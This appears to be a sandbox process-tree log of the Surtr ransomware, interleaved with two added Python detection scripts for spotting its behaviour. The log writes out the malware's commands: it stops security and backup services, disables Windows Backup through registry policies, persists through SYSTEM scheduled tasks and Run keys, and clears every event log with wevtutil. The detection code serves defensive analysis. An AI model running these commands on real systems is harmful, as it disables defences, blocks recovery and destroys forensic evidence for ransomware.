C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵PID:4248
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵PID:3424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵PID:4652
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵PID:964
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵PID:4048
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵PID:4032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵PID:2332
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵PID:1216
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:1648
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵PID:4180
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵PID:4004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵PID:692
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:4268
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:1484
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵PID:772
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵PID:4600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵PID:5104
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵PID:904
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵PID:5032
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵PID:4456
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵PID:488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵PID:1268
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵PID:1220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵PID:3124
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵PID:344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵PID:2452
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵PID:4460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵PID:5012
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵PID:5000
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵PID:5112
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵PID:4772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵PID:4940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵PID:4840
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵PID:5088
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵PID:852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵PID:1380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵PID:1036
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵PID:1172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵PID:3664
-
-
-
-
C:\Windows\system32\cmd.exe  (depth 3, PID 1356)
  cmdline: C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
    C:\Windows\system32\attrib.exe  (depth 4, PID 4812)
      cmdline: attrib +R /S "C:\ProgramData\Service"
      - Views/modifies file attributes

C:\Windows\system32\cmd.exe  (depth 3, PID 1816)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    C:\Windows\system32\net.exe  (depth 4, PID 2724)
      cmdline: net stop "IMAP4Svc"
        C:\Windows\system32\net1.exe  (depth 5, PID 2140)
          cmdline: C:\Windows\system32\net1 stop "IMAP4Svc"

C:\Windows\system32\cmd.exe  (depth 3, PID 4900)
  cmdline: C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    C:\Windows\system32\attrib.exe  (depth 4, PID 264)
      cmdline: attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      - Views/modifies file attributes

C:\Windows\system32\cmd.exe  (depth 3, PID 2768)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
    C:\Windows\system32\net.exe  (depth 4, PID 2100)
      cmdline: net stop "macmnsvc"
        C:\Windows\system32\net1.exe  (depth 5, PID 1488)
          cmdline: C:\Windows\system32\net1 stop "macmnsvc"

C:\Windows\system32\cmd.exe  (depth 3, PID 3496)
  cmdline: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    C:\Windows\system32\schtasks.exe  (depth 4, PID 1304)
      cmdline: schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)

C:\Windows\system32\cmd.exe  (depth 3, PID 984)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "masvc"
    C:\Windows\system32\net.exe  (depth 4, PID 268)
      cmdline: net stop "masvc"
        C:\Windows\system32\net1.exe  (depth 5, PID 4128)
          cmdline: C:\Windows\system32\net1 stop "masvc"

C:\Windows\system32\cmd.exe  (depth 3, PID 632)
  cmdline: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    C:\Windows\system32\schtasks.exe  (depth 4, PID 4872)
      cmdline: schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      - Creates scheduled task(s)

C:\Windows\system32\cmd.exe  (depth 3, PID 4932)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "MBAMService"
    C:\Windows\system32\net.exe  (depth 4, PID 4016)
      cmdline: net stop "MBAMService"
        C:\Windows\system32\net1.exe  (depth 5, PID 4936)
          cmdline: C:\Windows\system32\net1 stop "MBAMService"

C:\Windows\system32\cmd.exe  (depth 3, PID 3724)
  cmdline: C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"

C:\Windows\system32\cmd.exe  (depth 3, PID 1752)
  cmdline: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    C:\Windows\system32\reg.exe  (depth 4, PID 1464)
      cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f

C:\Windows\system32\cmd.exe  (depth 3, PID 1472)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"
    C:\Windows\system32\net.exe  (depth 4, PID 2984)
      cmdline: net stop "MBEndpointAgent"

C:\Windows\system32\cmd.exe  (depth 3, PID 2324)
  cmdline: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    C:\Windows\system32\reg.exe  (depth 4, PID 4952)
      cmdline: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      - Adds Run key to start application

C:\Windows\system32\cmd.exe  (depth 3, PID 4164)
  cmdline: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    C:\Windows\system32\reg.exe  (depth 4, PID 4392)
      cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      - Adds Run key to start application

C:\Windows\system32\cmd.exe  (depth 3, PID 4948)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"
    C:\Windows\system32\net.exe  (depth 4, PID 1940)
      cmdline: net stop "McAfeeEngineService"
        C:\Windows\system32\net1.exe  (depth 5, PID 4080)
          cmdline: C:\Windows\system32\net1 stop "McAfeeEngineService"

C:\Windows\system32\cmd.exe  (depth 3, PID 4296)
  cmdline: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    C:\Windows\system32\reg.exe  (depth 4, PID 3620)
      cmdline: reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f

C:\Windows\system32\cmd.exe  (depth 3, PID 4992)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"
    C:\Windows\system32\net.exe  (depth 4, PID 4040)
      cmdline: net stop "McAfeeFramework"
        C:\Windows\system32\net1.exe  (depth 5, PID 3444)
          cmdline: C:\Windows\system32\net1 stop "McAfeeFramework"

C:\Windows\system32\cmd.exe  (depth 3, PID 4468)
  cmdline: C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"

C:\Windows\system32\cmd.exe  (depth 3, PID 4968)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"
    C:\Windows\system32\net.exe  (depth 4, PID 4416)
      cmdline: net stop "McAfeeFrameworkMcAfeeFramework"
        C:\Windows\system32\net1.exe  (depth 5, PID 4476)
          cmdline: C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"

C:\Windows\system32\cmd.exe  (depth 3, PID 3028)
  cmdline: C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"

C:\Windows\system32\cmd.exe  (depth 3, PID 4396)
  cmdline: C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"

C:\Windows\system32\cmd.exe  (depth 3, PID 3380)
  cmdline: C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"

C:\Windows\system32\cmd.exe  (depth 3, PID 4976)
  cmdline: C:\Windows\system32\cmd.exe /c net stop "McShield"
    C:\Windows\system32\net.exe  (depth 4, PID 4256)
      cmdline: net stop "McShield"
        C:\Windows\system32\net1.exe  (depth 5, PID 3864)
          cmdline: C:\Windows\system32\net1 stop "McShield"

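Detection logic for the command lines above, added here as an example (it is not sandbox output and not Surtr's code): a small classifier that maps each process command line to the behaviour it represents (service stop, logon scheduled task, Run/RunOnce key, Startup-folder drop, event-log clear, attrib +R on the staging directory) and raises the severity where the arguments make the intent unambiguous: a stopped service that is on a security-product watch-list, a task registered with /RU SYSTEM /RL HIGHEST, or a cleared Application/Security/System log. The sample command lines are constructed by hand from the tree above; the MITRE technique ids and the service watch-list are the example's own assumptions.

```python
"""Classify Windows process command lines into the behaviours seen in the Surtr tree."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Watch-list of security-product service names stopped in the tree above.
# Assumption for this example: extend it from your own software inventory.
SECURITY_SERVICES = {
    "mbamservice", "mbendpointagent", "mcshield", "masvc", "macmnsvc",
    "mcafeeengineservice", "mcafeeframework", "mcafeeframeworkmcafeeframework",
}
CORE_LOGS = {"application", "security", "system"}


@dataclass(frozen=True)
class Finding:
    technique: str   # MITRE ATT&CK id ("attrib" where no id is asserted)
    label: str
    value: str       # service / task / registry key / path / log the command touched
    severity: str    # "medium" or "high"


# (technique, label, regex with exactly one capture group)
RULES = [
    ("T1489", "service stop",
     re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?([^"\s]+)"?', re.I)),
    ("T1053.005", "logon scheduled task",
     re.compile(r'\bschtasks(?:\.exe)?\s+/create\b.*?/tn\s+"?([^"\s]+)"?', re.I)),
    ("T1547.001", "Run/RunOnce key",
     re.compile(r'\breg(?:\.exe)?\s+add\s+(HK\S*?\\CurrentVersion\\Run(?:Once)?)\b', re.I)),
    ("T1547.001", "Startup folder drop",
     re.compile(r'\bcopy\b.*?"([^"]*\\Start Menu\\Programs\\Startup\\[^"]*)"', re.I)),
    ("T1070.001", "event log cleared",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+"?([^"]+)"?', re.I)),
    ("attrib", "read-only flag on staging directory",
     re.compile(r'\battrib(?:\.exe)?\s+\+R\s+/S\s+"?([^"]+)"?', re.I)),
]


def classify(cmdline: str) -> list[Finding]:
    """Return one Finding per rule that matches this command line."""
    low = cmdline.lower()
    findings = []
    for technique, label, rx in RULES:
        m = rx.search(cmdline)
        if not m:
            continue
        value, severity = m.group(1), "medium"
        if technique == "T1489" and value.lower() in SECURITY_SERVICES:
            label, severity = "security service stop", "high"
        elif technique == "T1053.005" and "/ru system" in low and "/rl highest" in low:
            severity = "high"        # task runs as SYSTEM at every logon
        elif technique == "T1070.001" and value.lower() in CORE_LOGS:
            severity = "high"
        findings.append(Finding(technique, label, value, severity))
    return findings


def scan(cmdlines) -> list[Finding]:
    """Classify every command line; one list entry per (line, matching rule)."""
    return [f for c in cmdlines for f in classify(c)]


def summarize(findings) -> dict[str, int]:
    """Count findings per technique id."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


# Constructed sample modelled on the process tree above (not sandbox output).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"',
    r'net stop "MBAMService"',
    r'C:\Windows\system32\net1 stop "IMAP4Svc"',
    r'schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F',
    r'schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f',
    r'reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f',
    r'C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"',
    r'wevtutil.exe cl "Application"',
    r'wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"',
    r'C:\Windows\system32\svchost.exe -k netsvcs',   # benign control line, matches nothing
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f.severity:6} {f.technique:10} {f.label}: {f.value}")
    print(summarize(scan(SAMPLE_CMDLINES)))
```

Fed the CommandLine field of Sysmon event 1 or Security 4688 records, `scan()` yields one finding per matching process. A `cmd.exe /c ...` parent and its `net.exe`/`reg.exe` child both match the same rule, which is useful for tying the chain together but means counts should be deduplicated per (technique, value) before reporting.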
C:\Windows\system32\cmd.exe  (depth 3, PID 1676)
  cmdline: C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
    C:\Windows\system32\cmd.exe  (depth 4, PID 3648)
      cmdline: C:\Windows\system32\cmd.exe /c wevtutil.exe el
        C:\Windows\system32\wevtutil.exe  (depth 5, PID 3320)
          cmdline: wevtutil.exe el

    The remaining children of PID 1676 are one C:\Windows\system32\wevtutil.exe process (depth 4) per log name returned by the enumeration; each is listed as its command line and PID, with any sandbox signature beneath it.
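The loop above clears every log that `wevtutil el` returns, which is what produces the fan-out of `wevtutil cl` children in this tree. A per-line rule fires on each child, but the distinctive signal is the shape: one parent spawning hundreds of `wevtutil cl` processes within seconds, right after a `wevtutil el`. The following added example (not sandbox output and not Surtr's code) groups constructed process-creation records by parent PID and reports any parent that cleared at least `min_logs` logs inside a sliding time window, noting whether the parent's own command line is the `for /F ... wevtutil el ... wevtutil cl` template and which of the core Application/Security/System logs were hit. PIDs 1676, 3648 and 3320 are taken from the tree; the timestamps, the remaining PIDs and the record layout are the example's own assumptions.

```python
"""Detect a burst of event-log clears under one parent process (T1070.001 fan-out)."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Process-creation record; field set assumed for this example (Sysmon 1 / Security 4688 style)."""
    ts: float      # seconds; constructed, monotonic within the sample
    pid: int
    ppid: int
    cmdline: str


CLEAR_RX = re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+"?([^"]+)"?', re.I)
LOOP_RX = re.compile(
    r'\bfor\s+/F\b.*\bwevtutil(?:\.exe)?\s+el\b.*\bwevtutil(?:\.exe)?\s+cl\b', re.I)
CORE_LOGS = {"application", "security", "system"}


@dataclass(frozen=True)
class Burst:
    parent_pid: int
    first_ts: float
    last_ts: float
    logs: tuple[str, ...]
    from_for_loop: bool   # parent's own command line is the `for /F ... el ... cl` template

    @property
    def core_logs(self) -> tuple[str, ...]:
        return tuple(name for name in self.logs if name.lower() in CORE_LOGS)


def find_clear_bursts(events, min_logs: int = 10, window: float = 60.0) -> list[Burst]:
    """Report every parent that spawned at least `min_logs` `wevtutil cl` children
    inside `window` seconds (densest sliding window per parent)."""
    loop_pids = {e.pid for e in events if LOOP_RX.search(e.cmdline)}
    by_parent: dict[int, list[tuple[float, str]]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        m = CLEAR_RX.search(e.cmdline)
        if not m or "%" in m.group(1):      # "%s" is the loop variable, not a log name
            continue
        by_parent[e.ppid].append((e.ts, m.group(1)))

    bursts = []
    for ppid, clears in by_parent.items():
        best_count, best_start, best_end = 0, 0, 0
        start = 0
        for end in range(len(clears)):
            while clears[end][0] - clears[start][0] > window:
                start += 1
            if end - start + 1 > best_count:
                best_count, best_start, best_end = end - start + 1, start, end
        if best_count >= min_logs:
            run = clears[best_start:best_end + 1]
            bursts.append(Burst(ppid, run[0][0], run[-1][0],
                                tuple(name for _, name in run), ppid in loop_pids))
    return bursts


# Constructed sample modelled on the tree above: PIDs 1676/3648/3320 come from it,
# the timestamps and the remaining PIDs are invented for the example.
LOOP_CMD = r'''C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"'''
CLEARED = ["AirSpaceChannel", "Analytic", "Application", "DirectShowFilterGraph",
           "DirectShowPluginControl", "Els_Hyphenation/Analytic", "EndpointMapper",
           "FirstUXPerf-Analytic", "ForwardedEvents", "General Logging",
           "HardwareEvents", "IHM_DebugChannel"]
SAMPLE_EVENTS = [
    ProcEvent(100.0, 1676, 3680, LOOP_CMD),
    ProcEvent(100.1, 3648, 1676, r'C:\Windows\system32\cmd.exe /c wevtutil.exe el'),
    ProcEvent(100.2, 3320, 3648, "wevtutil.exe el"),
    *[ProcEvent(101.0 + 0.2 * i, 4000 + i, 1676, f'wevtutil.exe cl "{name}"')
      for i, name in enumerate(CLEARED)],
    # A single clear by an unrelated parent: legitimate admin use, stays below threshold.
    ProcEvent(500.0, 4200, 999, 'wevtutil.exe cl "Microsoft-Windows-Audio/Performance"'),
]

if __name__ == "__main__":
    for b in find_clear_bursts(SAMPLE_EVENTS):
        print(f"parent {b.parent_pid}: {len(b.logs)} logs cleared in "
              f"{b.last_ts - b.first_ts:.1f}s, loop template={b.from_for_loop}, core={b.core_logs}")
```

The threshold and window are deliberately loose: a legitimate administrator clears one or two logs, while this loop clears every channel the host has. Lower `min_logs` if the parent is also flagged by the `for /F` template match, and keep the lone `wevtutil cl` below threshold so the rule does not page on routine housekeeping.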
    wevtutil.exe cl "AirSpaceChannel"  (PID 4528)
    wevtutil.exe cl "Analytic"  (PID 2616)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Application"  (PID 3048)
    wevtutil.exe cl "DirectShowFilterGraph"  (PID 4628)
    wevtutil.exe cl "DirectShowPluginControl"  (PID 4608)
    wevtutil.exe cl "Els_Hyphenation/Analytic"  (PID 4548)
    wevtutil.exe cl "EndpointMapper"  (PID 3860)
    wevtutil.exe cl "FirstUXPerf-Analytic"  (PID 1780)
    wevtutil.exe cl "ForwardedEvents"  (PID 4180)
    wevtutil.exe cl "General Logging"  (PID 5056)
    wevtutil.exe cl "HardwareEvents"  (PID 2320)
    wevtutil.exe cl "IHM_DebugChannel"  (PID 5092)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"  (PID 1608)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"  (PID 1380)
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"  (PID 4812)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"  (PID 4892)
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"  (PID 3240)
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"  (PID 284)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Internet Explorer"  (PID 1488)
    wevtutil.exe cl "Key Management Service"  (PID 4868)
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"  (PID 3088)
    wevtutil.exe cl "MedaFoundationVideoProc"  (PID 3984)
    wevtutil.exe cl "MedaFoundationVideoProcD3D"  (PID 4080)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "MediaFoundationAsyncWrapper"  (PID 4996)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "MediaFoundationContentProtection"  (PID 4336)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "MediaFoundationDS"  (PID 4352)
    wevtutil.exe cl "MediaFoundationDeviceProxy"  (PID 4112)
    wevtutil.exe cl "MediaFoundationMediaEngine"  (PID 3040)
    wevtutil.exe cl "MediaFoundationPerformance"  (PID 4236)
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "MediaFoundationPerformanceCore"  (PID 4476)
    wevtutil.exe cl "MediaFoundationPipeline"  (PID 3792)
    wevtutil.exe cl "MediaFoundationPlatform"  (PID 2964)
    wevtutil.exe cl "MediaFoundationSrcPrefetch"  (PID 2456)
    wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"  (PID 2224)
    wevtutil.exe cl "Microsoft-AppV-Client/Admin"  (PID 3144)
    wevtutil.exe cl "Microsoft-AppV-Client/Debug"  (PID 4756)
    wevtutil.exe cl "Microsoft-AppV-Client/Operational"  (PID 5080)
    wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"  (PID 4860)
    wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"  (PID 5088)
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"  (PID 4128)
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"  (PID 4872)
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"  (PID 4868)
      - Suspicious use of AdjustPrivilegeToken
    wevtutil.exe cl "Microsoft-IE/Diagnostic"  (PID 1336)
